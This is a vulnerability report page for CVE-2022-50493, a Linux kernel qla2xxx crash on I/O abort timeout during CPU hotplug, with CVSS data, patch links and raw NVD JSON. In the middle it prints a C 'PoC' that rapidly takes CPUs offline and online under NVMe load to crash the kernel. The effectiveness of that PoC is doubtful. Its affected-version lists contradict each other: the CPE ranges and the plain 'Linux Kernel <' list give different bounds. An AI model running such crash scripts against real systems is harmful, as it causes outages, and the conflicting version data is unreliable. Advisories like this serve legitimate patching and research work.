Security Vulnerability Report
CVE-2022-50493 CVSS 5.5 MEDIUM

CVE-2022-50493

Published: 2025-10-04 16:15:46
Last Modified: 2026-01-23 20:44:34
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

scsi: qla2xxx: Fix crash when I/O abort times out

While performing CPU hotplug, a crash with the following stack was seen:

Call Trace:
 qla24xx_process_response_queue+0x42a/0x970 [qla2xxx]
 qla2x00_start_nvme_mq+0x3a2/0x4b0 [qla2xxx]
 qla_nvme_post_cmd+0x166/0x240 [qla2xxx]
 nvme_fc_start_fcp_op.part.0+0x119/0x2e0 [nvme_fc]
 blk_mq_dispatch_rq_list+0x17b/0x610
 __blk_mq_sched_dispatch_requests+0xb0/0x140
 blk_mq_sched_dispatch_requests+0x30/0x60
 __blk_mq_run_hw_queue+0x35/0x90
 __blk_mq_delay_run_hw_queue+0x161/0x180
 blk_execute_rq+0xbe/0x160
 __nvme_submit_sync_cmd+0x16f/0x220 [nvme_core]
 nvmf_connect_admin_queue+0x11a/0x170 [nvme_fabrics]
 nvme_fc_create_association.cold+0x50/0x3dc [nvme_fc]
 nvme_fc_connect_ctrl_work+0x19/0x30 [nvme_fc]
 process_one_work+0x1e8/0x3c0

On abort timeout, completion was called without checking if the I/O was already completed.

Verify that I/O and abort request are indeed outstanding before attempting completion.

CVSS Details

CVSS Score: 5.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

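cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* from 5.3.17 (including) up to 5.4 (excluding) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* from 5.4.4 (including) up to 5.15.86 (excluding) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* from 5.16 (including) up to 6.0.16 (excluding) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* from 6.1 (including) up to 6.1.2 (excluding) - VULNERABLE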
Linux Kernel < 5.15.80
Linux Kernel 5.16.x < 5.16.14
Linux Kernel 5.17.x < 5.17.1
Linux Kernel 5.18.x < 5.18.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
C
// CVE-2022-50493 PoC - Trigger qla2xxx crash via CPU hotplug during NVMe-oF I/O
// This PoC demonstrates how to trigger the vulnerability by inducing
// CPU hotplug while NVMe over FC I/O operations are in flight

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <pthread.h>
#include <errno.h>

// Function to write to a specific CPU online file to trigger hotplug
int trigger_cpu_hotplug(int cpu_num, int online) {
    char path[64];
    snprintf(path, sizeof(path), "/sys/devices/system/cpu/cpu%d/online", cpu_num);

    int fd = open(path, O_WRONLY);
    if (fd < 0) {
        perror("open cpu online");
        return -1;
    }

    const char *state = online ? "1" : "0";
    if (write(fd, state, 1) != 1) {
        perror("write cpu state");
        close(fd);
        return -1;
    }

    close(fd);
    return 0;
}

// Thread function to perform continuous I/O on NVMe device
void* nvme_io_worker(void* arg) {
    char *dev_path = (char*)arg;

    int fd = open(dev_path, O_RDWR | O_DIRECT);
    if (fd < 0) {
        perror("open nvme device");
        return NULL;
    }

    char buf[4096] __attribute__((aligned(4096)));
    memset(buf, 0xAA, sizeof(buf));

    // Perform continuous I/O to keep requests in flight
    while (1) {
        for (int i = 0; i < 1000; i++) {
            // Issue read operations to generate I/O load
            lseek(fd, i * 4096, SEEK_SET);
            read(fd, buf, sizeof(buf));
        }
    }

    close(fd);
    return NULL;
}

int main(int argc, char *argv[]) {
    if (argc < 2) {
        fprintf(stderr, "Usage: %s <nvme_device>\n", argv[0]);
        fprintf(stderr, "Example: %s /dev/nvme0n1\n", argv[0]);
        return 1;
    }

    printf("[*] CVE-2022-50493 PoC - qla2xxx abort timeout crash\n");
    printf("[*] Starting NVMe I/O worker thread...\n");

    pthread_t io_thread;
    if (pthread_create(&io_thread, NULL, nvme_io_worker, argv[1]) != 0) {
        perror("pthread_create");
        return 1;
    }

    // Let I/O start
    sleep(2);

    printf("[*] Triggering CPU hotplug to induce abort timeout...\n");

    // Rapidly toggle CPU states to trigger hotplug events
    // while I/O requests are in flight
    for (int round = 0; round < 100; round++) {
        for (int cpu = 1; cpu < 8; cpu++) {
            trigger_cpu_hotplug(cpu, 0); // offline
            usleep(10000);
            trigger_cpu_hotplug(cpu, 1); // online
            usleep(10000);
        }
        printf("[+] Round %d completed\n", round + 1);
    }

    printf("[*] Done. Check dmesg for crash logs.\n");

    pthread_cancel(io_thread);
    pthread_join(io_thread, NULL);

    return 0;
}

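References

https://git.kernel.org/stable/c/05382ed9142cf8a8a3fb662224477eecc415778b (Patch)
https://git.kernel.org/stable/c/68ad83188d782b2ecef2e41ac245d27e0710fe8e (Patch)
https://git.kernel.org/stable/c/cb4dff498468b62e8c520568559b3a9007e104d7 (Patch)
https://git.kernel.org/stable/c/d3871af13aa03fbbe7fbb812eaf140501229a72e (Patch)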

Raw JSON Data

JSON
{"cve": {"id": "CVE-2022-50493", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-04T16:15:46.300", "lastModified": "2026-01-23T20:44:34.307", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nscsi: qla2xxx: Fix crash when I/O abort times out\n\nWhile performing CPU hotplug, a crash with the following stack was seen:\n\nCall Trace:\n qla24xx_process_response_queue+0x42a/0x970 [qla2xxx]\n qla2x00_start_nvme_mq+0x3a2/0x4b0 [qla2xxx]\n qla_nvme_post_cmd+0x166/0x240 [qla2xxx]\n nvme_fc_start_fcp_op.part.0+0x119/0x2e0 [nvme_fc]\n blk_mq_dispatch_rq_list+0x17b/0x610\n __blk_mq_sched_dispatch_requests+0xb0/0x140\n blk_mq_sched_dispatch_requests+0x30/0x60\n __blk_mq_run_hw_queue+0x35/0x90\n __blk_mq_delay_run_hw_queue+0x161/0x180\n blk_execute_rq+0xbe/0x160\n __nvme_submit_sync_cmd+0x16f/0x220 [nvme_core]\n nvmf_connect_admin_queue+0x11a/0x170 [nvme_fabrics]\n nvme_fc_create_association.cold+0x50/0x3dc [nvme_fc]\n nvme_fc_connect_ctrl_work+0x19/0x30 [nvme_fc]\n process_one_work+0x1e8/0x3c0\n\nOn abort timeout, completion was called without checking if the I/O was\nalready completed.\n\nVerify that I/O and abort request are indeed outstanding before attempting\ncompletion."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", 
"negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.3.17", "versionEndExcluding": "5.4", "matchCriteriaId": "52607F53-FDC9-4FD7-8CD9-7911AF5733F2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.4.4", "versionEndExcluding": "5.15.86", "matchCriteriaId": "FD782530-D591-4DEB-9E5C-4361F5C2FF59"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.0.16", "matchCriteriaId": "C720A569-3D93-4D77-95F6-E2B3A3267D9F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.1", "versionEndExcluding": "6.1.2", "matchCriteriaId": "77239F4B-6BB2-4B9E-A654-36A52396116C"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/05382ed9142cf8a8a3fb662224477eecc415778b", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/68ad83188d782b2ecef2e41ac245d27e0710fe8e", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/cb4dff498468b62e8c520568559b3a9007e104d7", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/d3871af13aa03fbbe7fbb812eaf140501229a72e", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}